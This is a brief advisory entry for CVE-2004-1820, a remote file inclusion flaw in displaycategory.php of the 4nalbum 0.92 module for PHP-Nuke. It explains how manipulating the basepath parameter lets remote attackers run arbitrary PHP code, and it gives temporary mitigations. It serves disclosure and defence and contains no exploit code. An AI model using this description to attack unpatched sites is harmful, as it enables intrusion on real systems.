CVE-2004-1820

Name of the Vulnerable Software and Affected Versions 4nalbum versions 0.92 for PHP-Nuke 6.5 through 7.0

Description The issue allows remote attackers to execute arbitrary PHP code by modifying the basepath parameter to reference a URL on a remote web server that contains fileFunctions.php. This is achieved through a remote file inclusion vulnerability in displaycategory.php.

Recommendations For 4nalbum version 0.92, consider restricting access to the displaycategory.php file until a patch is available. As a temporary workaround, avoid using the basepath parameter in the affected API endpoint until the issue is resolved.